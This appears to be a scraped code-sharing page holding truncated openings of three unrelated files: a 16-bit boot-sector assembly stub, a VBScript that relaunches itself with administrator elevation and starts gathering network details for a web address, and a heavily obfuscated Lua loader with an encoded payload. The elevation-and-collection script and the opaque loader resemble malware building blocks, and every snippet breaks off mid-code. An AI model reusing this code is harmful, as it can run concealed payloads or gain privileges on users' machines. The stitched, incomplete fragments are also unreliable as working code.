This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [bits 16] | |
| [org 0x7c00] | |
| main: | |
| call clear_screen | |
| mov ax, cs | |
| mov ds, ax | |
| mov si, msg | |
| push ax |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Website = "http://localhost/info.php" | |
| Function RequestElevation() | |
| If Not WScript.Arguments.Named.Exists("elevate") Then | |
| CreateObject("Shell.Application").ShellExecute WScript.FullName, chr(34) & WScript.ScriptFullName & chr(34) & " /elevate", "", "runas", 1 | |
| WScript.Quit | |
| End If | |
| End Function | |
| Function GetNetworkDetails() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| return(function(lIIlIIIIlIIIIIIIIIIlIlllI,llIlIIIlIIlIlIlIlIIIlIII,llIlIIIlIIlIlIlIlIIIlIII)local IlIIlllIIIIIIlIlIlIII=string.char;local IlIIlIIllIllllII=string.sub;local IlllllllIIllIIIlIlIIl=table.concat;local lllIIIllllll=math.ldexp;local IIIllIIlIIlIlIIlllII=getfenv or function()return _ENV end;local lllIIIIIl=select;local IlIIllIIlIl=unpack or table.unpack;local llIlIIIlIIlIlIlIlIIIlIII=tonumber;local llllllIlllIl='\155\154\154\154\154\147\154\154\154\255\236\255\244\238\214\245\245\234\153\154\154\154\152\128\154\154\154\154\154\154\154\136\154\154\154\154\155\154\154\154\154\155\154\154\154\155\154\154\154\154\153\154\154\154\150\154\154\154\155\154\154\154\150\154\154\154\155\154\154\154\145\154\154\154\152\154\154\154\154\154\154\106\165\154\153\154\154\154\238\252\247\154\158\154\154\154\255\226\255\249\154\149\154\154\154\251\254\254\201\242\251\247\251\244\213\248\240\255\249\238\152\154\154\154\154\154\154\171\218\154\158\154\154\154\247\251\238\242\154\156\154\154\154\232\251\244\254\245\247\15 |